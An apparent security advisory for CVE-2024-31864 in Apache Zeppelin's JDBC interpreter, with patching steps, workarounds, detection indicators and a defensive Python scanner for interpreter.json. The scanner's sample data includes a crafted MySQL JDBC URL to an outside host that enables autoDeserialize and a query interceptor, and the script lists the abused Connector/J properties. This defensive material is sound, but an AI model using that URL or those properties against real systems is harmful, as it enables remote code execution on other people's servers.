CVE-2024-31864
📋 TL;DR
CVE-2024-31864 is a code injection vulnerability in Apache Zeppelin's JDBC interpreter. An attacker who can set the connection properties used for a MySQL JDBC connection can have the Zeppelin server execute arbitrary code. The pattern is the one behind CVE-2020-11974 in Apache DolphinScheduler, where attacker-controlled MySQL Connector/J connection parameters turn the JDBC client into a code-execution primitive against the host that runs it. It affects Apache Zeppelin versions before 0.11.1. Successful exploitation gives the attacker code execution as the Zeppelin interpreter process and, with it, access to the notebooks, data and stored database credentials that process can reach.
💻 Affected Systems
- Apache Zeppelin
📦 What is this software?
Apache Zeppelin is a web-based notebook for interactive data analytics. Its JDBC interpreter runs SQL from notebook paragraphs against databases such as MySQL, using connection URLs and driver properties that are configured in the interpreter settings.
⚠️ Risk & Real-World Impact
Worst Case
Complete compromise of the Zeppelin host: remote code execution as the interpreter process, theft of notebook data and stored database credentials, privilege escalation, and lateral movement to the databases and other systems the host can reach.
Likely Case
A user who is allowed to edit JDBC interpreter settings (or an attacker holding such a session) gains code execution inside the Zeppelin interpreter environment, followed by unauthorized database access and data exfiltration.
If Mitigated
Limited impact where interpreter settings can only be changed by administrators, the Zeppelin host's outbound connections are restricted to its known database servers, and setting changes are monitored.
🎯 Exploit Status
Exploitation requires network access to Zeppelin and the ability to change the JDBC interpreter's connection settings. In a default installation, where authentication is not configured and anonymous access is allowed, anyone who can reach the web UI can do this; with Shiro enabled it is limited to users granted interpreter-settings rights. The vulnerability is the same attack class as CVE-2020-11974, so the well-known technique for that issue (malicious MySQL Connector/J connection properties) is expected to transfer; the sources listed below give no further exploit details.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 0.11.1
Vendor Advisory: https://lists.apache.org/thread/752qdk0rnkd9nqtornz734zwb7xdwcdb
Restart Required: Yes
Instructions:
1. Back up all Zeppelin notebooks and configuration, including conf/interpreter.json.
2. Stop the Zeppelin service.
3. Download Apache Zeppelin 0.11.1 from zeppelin.apache.org and verify the checksum and signature.
4. Replace the existing installation with version 0.11.1.
5. Restore configuration and notebooks.
6. Before restarting, review the restored conf/interpreter.json for JDBC URLs pointing at unknown hosts or carrying unusual MySQL connection parameters; an already-tampered setting is not undone by the upgrade.
7. Start the Zeppelin service.
8. Verify the reported version is 0.11.1.
🔧 Temporary Workarounds
Restrict Database Connections
Limit Zeppelin's ability to connect to external databases by removing the JDBC interpreter jars and restricting outbound network access. Both steps below are blunt: the first disables the JDBC interpreter entirely and is not reversible without reinstalling it, and the second also blocks legitimate MySQL traffic.
# Only if the JDBC interpreter is not needed; back up first, this cannot be undone without a reinstall
sudo rm -rf /path/to/zeppelin/interpreter/jdbc/*.jar
# Blocks outbound MySQL on the default port only; an attacker-controlled server can listen on any port, so prefer a default-deny egress policy that allows only the real database hosts
sudo iptables -A OUTPUT -p tcp --dport 3306 -j DROP
Network Segmentation
Isolate Zeppelin instances from production databases, allow outbound connections only to the database hosts Zeppelin is meant to use (on any port, not just 3306), and restrict access to the Zeppelin UI to trusted IPs.
🧯 If You Can't Patch
- Disable the JDBC interpreter, or at least remove the MySQL Connector/J artifact from its dependencies, until the upgrade is possible
- Restrict who may change interpreter settings: enable Shiro authentication in conf/shiro.ini and keep interpreter configuration limited to administrators (the shipped shiro.ini.template does this with the [urls] line `/api/interpreter/** = authc, roles[admin]`); a default installation with anonymous access lets anyone who reaches the UI set the JDBC URL
- Implement strict egress controls so the Zeppelin host can reach only its known database servers
- Review conf/interpreter.json for MySQL URLs pointing at unknown hosts or carrying connection parameters you did not configure
🔍 How to Verify
Check if Vulnerable:
Check the Zeppelin version in the web UI (About Zeppelin in the user menu) or with the commands below; anything below 0.11.1 is affected. Independently of the version, inspect conf/interpreter.json for JDBC `*.url` properties that use jdbc:mysql: with hosts or connection parameters you did not configure, since a tampered setting survives an upgrade.
Check Version:
curl -s http://localhost:8080/api/version   # JSON body with a "version" field; /api/version is anon in the shipped shiro.ini.template
find /path/to/zeppelin -maxdepth 2 \( -name 'zeppelin-*.jar' -o -name 'zeppelin-*.war' \)   # the release number is part of the artifact names
Verify Fix Applied:
After the upgrade, confirm the reported version is 0.11.1 and that conf/interpreter.json contains only the MySQL URLs and connection parameters you expect; then run a harmless query (for example SELECT 1) through each legitimate MySQL JDBC connection to confirm it still works.
📡 Detection & Monitoring
Log Indicators:
- Changes to JDBC interpreter settings, in particular `*.url` values that switch to jdbc:mysql: or gain Connector/J parameters such as autoDeserialize, allowLoadLocalInfile, allowUrlInLocalInfile, queryInterceptors or statementInterceptors (watch conf/interpreter.json with file integrity monitoring and, if an HTTP access log is enabled, PUT requests to /api/interpreter/setting/<id>)
- JDBC interpreter errors or stack traces mentioning Java deserialization or LOAD DATA LOCAL INFILE
- Unexpected child processes spawned by the JDBC interpreter process
Network Indicators:
- The Zeppelin host opening MySQL connections to hosts that are not its known databases, on 3306 or any other port
- A MySQL server the Zeppelin host connects to requesting LOAD DATA LOCAL INFILE for files on the Zeppelin host
SIEM Query:
source="zeppelin.logs" AND ("jdbc" OR "mysql") AND ("autoDeserialize" OR "allowLoadLocalInfile" OR "allowUrlInLocalInfile" OR "queryInterceptors" OR "statementInterceptors")
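The following Python script is an added example, not Apache Zeppelin code and not taken from any of the advisories above. It applies the checks from the How to Verify and Detection sections offline: it compares a reported version string against the 0.11.1 fix release and scans a Zeppelin conf/interpreter.json for MySQL JDBC URLs that point at hosts outside an allow-list or carry the MySQL Connector/J properties abused in CVE-2020-11974-style attacks. The embedded interpreter.json sample, the host 203.0.113.7 and the allowed_hosts set are constructed for the example, and the property list is a scanning heuristic, not the exact set the Zeppelin fix blocks.

```python
"""Added example, not Apache Zeppelin code: offline checks for CVE-2024-31864.

1. is_vulnerable_version(): compare a reported version string with the fixed release.
2. find_risky_jdbc_settings(): scan a parsed conf/interpreter.json for MySQL JDBC URLs
   that point at unexpected hosts or carry Connector/J properties abused in
   CVE-2020-11974-style attacks against the JDBC client.
"""
import json
import re
from urllib.parse import parse_qs, urlsplit

FIXED_VERSION = (0, 11, 1)

# MySQL Connector/J properties that turn a connection into a deserialization,
# file-read or interceptor-loading primitive when the server or URL is attacker-controlled.
# Heuristic list for scanning (assumption); not the exact set checked by the Zeppelin fix.
DANGEROUS_PROPS = {
    "autodeserialize",
    "allowloadlocalinfile",
    "allowloadlocalinfileinpath",
    "allowurlinlocalinfile",
    "queryinterceptors",
    "statementinterceptors",
    "exceptioninterceptors",
    "connectionlifecycleinterceptors",
}


def parse_version(text):
    """'0.11.1', '0.11.1-SNAPSHOT' or '0.10.1-rc2' -> (major, minor, patch)."""
    m = re.match(r"\s*(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    return tuple(int(x) for x in m.groups())


def is_vulnerable_version(text):
    """True for any release before 0.11.1 (the affected range given on this page)."""
    return parse_version(text) < FIXED_VERSION


def analyse_jdbc_url(url, allowed_hosts=()):
    """Findings for one JDBC URL; an empty list means nothing notable.

    Only jdbc:mysql: URLs are inspected, because the vulnerability concerns the
    MySQL driver. allowed_hosts, when given, is the set of legitimate DB hosts.
    """
    findings = []
    if not url.lower().startswith("jdbc:mysql:"):
        return findings
    # Drop the 'jdbc:' prefix so the remainder parses as mysql://host:port/db?k=v
    parts = urlsplit(url[len("jdbc:"):])
    host = parts.hostname or ""
    if allowed_hosts and host not in allowed_hosts:
        findings.append(f"connects to unexpected host {host!r}")
    for key, values in parse_qs(parts.query, keep_blank_values=True).items():
        if key.lower() in DANGEROUS_PROPS:
            findings.append(f"dangerous property {key}={','.join(values)}")
    return findings


def find_risky_jdbc_settings(config, allowed_hosts=()):
    """Walk a parsed interpreter.json and return {setting name: {property: findings}}."""
    report = {}
    for setting in config.get("interpreterSettings", {}).values():
        if setting.get("group") != "jdbc":
            continue
        for prop_name, prop in setting.get("properties", {}).items():
            # Since Zeppelin 0.8 each property is {"name", "value", "type"};
            # older files store the bare value, so accept both shapes.
            value = prop.get("value") if isinstance(prop, dict) else prop
            if not prop_name.endswith(".url") or not isinstance(value, str):
                continue
            findings = analyse_jdbc_url(value, allowed_hosts)
            if findings:
                report.setdefault(setting.get("name", "?"), {})[prop_name] = findings
    return report


def scan_interpreter_json(path, allowed_hosts=()):
    """Convenience wrapper for a real file, e.g. /path/to/zeppelin/conf/interpreter.json."""
    with open(path, encoding="utf-8") as fh:
        return find_risky_jdbc_settings(json.load(fh), allowed_hosts)


# Constructed sample in the interpreter.json layout: one legitimate PostgreSQL
# connection and one MySQL prefix that a tampering user has pointed at an
# outside host with deserialization properties enabled.
SAMPLE_INTERPRETER_JSON = json.loads("""
{
  "interpreterSettings": {
    "jdbc": {
      "id": "jdbc", "name": "jdbc", "group": "jdbc",
      "properties": {
        "default.url":    {"name": "default.url",    "value": "jdbc:postgresql://db.internal:5432/analytics", "type": "string"},
        "default.driver": {"name": "default.driver", "value": "org.postgresql.Driver", "type": "string"},
        "mysql.url":      {"name": "mysql.url",      "value": "jdbc:mysql://203.0.113.7:3306/x?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor", "type": "string"},
        "mysql.driver":   {"name": "mysql.driver",   "value": "com.mysql.cj.jdbc.Driver", "type": "string"}
      }
    },
    "python": {"id": "python", "name": "python", "group": "python", "properties": {}}
  }
}
""")

if __name__ == "__main__":
    print("0.10.1 vulnerable:", is_vulnerable_version("0.10.1"))
    report = find_risky_jdbc_settings(SAMPLE_INTERPRETER_JSON, allowed_hosts={"db.internal"})
    for name, props in report.items():
        for prop, findings in props.items():
            print(f"[{name}] {prop}: " + "; ".join(findings))
```

Run it against a real installation with `scan_interpreter_json("/path/to/zeppelin/conf/interpreter.json", {"db.internal"})`; the host allow-list is what turns a noisy parameter scan into a check that also catches URLs quietly repointed at an attacker-controlled MySQL server with no unusual parameters at all.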
🔗 References
- http://www.openwall.com/lists/oss-security/2024/04/09/8
- https://github.com/apache/zeppelin/pull/4709
- https://lists.apache.org/thread/752qdk0rnkd9nqtornz734zwb7xdwcdb
- https://www.cve.org/CVERecord?id=CVE-2020-11974
- http://www.openwall.com/lists/oss-security/2025/08/03/3